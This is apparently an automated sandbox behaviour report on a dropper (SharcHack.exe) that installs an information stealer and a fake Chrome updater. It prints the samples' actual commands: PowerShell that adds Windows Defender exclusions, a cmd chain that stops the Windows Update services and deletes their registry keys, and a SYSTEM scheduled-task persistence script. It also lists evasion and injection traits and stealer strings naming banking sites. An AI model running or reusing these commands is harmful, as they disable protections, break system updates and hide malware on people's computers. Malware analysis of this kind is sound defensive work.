Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File Volume queried: C:\Users\user\AppData\Local\Temp\is-3E079.tmp FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File Volume queried: C:\Users\user\AppData\Local\Temp\is-3E079.tmp FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4E0F67 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

8_2_6B4E0F67

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BC6F1A0 GetSystemInfo,

7_2_6BC6F1A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599540	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598994	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598638	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598293	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598074	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597960	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597842	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597498	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596458	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596302	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596104	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595870	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594374	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594252	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594134	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594028	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593918	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593374	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593161	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592502	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: vmware, inc.
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000A91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: SharcHack.exe	Binary or memory string: ]YhGfswW}
Source: v2.exe, 00000007.00000002.2161277920.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: vmware7,1
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: vmware
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmpE21D.tmp.dat.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe

API call chain: ExitProcess graph end node

graph_5-13

Source: C:\Users\user\AppData\Local\Temp\3.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_02CCC1E8 LdrInitializeThunk,

7_2_02CCC1E8

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BBD43E3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6BBD43E3

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BBF8910 _memset,OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,_memset,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,_memset,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_memset,GetEnvironmentVariableW,OutputDebugStringA,_memset,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,_memset,GetEnvironmentVariableW,SetEnvironmentVariableW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_memset,__snprintf,OutputDebugStringA,

7_2_6BBF8910

Source: C:\Users\user\AppData\Local\Temp\v2.exe

7_2_6BBDF76D

Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe

Code function: 5_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,PathFindFileNameA,

5_2_00401AE1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF11180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,	2_2_00007FF69AF11180
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69AF1BA59 SetUnhandledExceptionFilter,	2_2_00007FF69AF1BA59
Source: C:\Users\user\AppData\Local\Temp\3.exe	Code function: 2_2_00007FF69B29D2A4 SetUnhandledExceptionFilter,	2_2_00007FF69B29D2A4
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBD43E3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6BBD43E3
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BBD1186 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6BBD1186
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B605DB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6B605DB3
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B601060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6B601060
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Code function: 8_2_6B601464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6B601464

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Google\Chrome\updater.exe	NtQuerySystemInformation: Direct from: 0x7FF61907501E
Source: C:\Users\user\AppData\Local\Temp\3.exe	NtQuerySystemInformation: Direct from: 0x7FF69AF1501E			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\sc.exe protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 360
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5828

Writes to foreign memory regions

Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\conhost.exe base: 26E2118010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\conhost.exe base: 8E06410010

Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Process created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tugby#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }
Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
